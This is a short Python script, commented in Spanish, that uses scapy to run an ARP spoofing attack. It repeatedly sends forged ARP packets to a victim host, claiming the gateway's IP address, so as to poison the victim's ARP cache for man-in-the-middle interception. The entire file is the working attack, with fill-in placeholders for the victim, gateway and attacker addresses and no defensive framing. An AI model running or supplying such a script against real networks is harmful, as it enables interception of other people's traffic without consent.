from scapy.all import *

import time

op=1 # Op code 1 para consulta arp
victim="10.252.177.142" # substituir con la IP de la víctima
spoof="10.252.177.129"  # substituir con la IP de la pasarela (gateway)
mac="3c:15:c2:d9:6a:ce" # substituir con la dirección MAC del atacante

arp=ARP(op=op,psrc=spoof,pdst=victim,hwdst=mac)

while 1:
	send(arp)
	time.sleep(2)



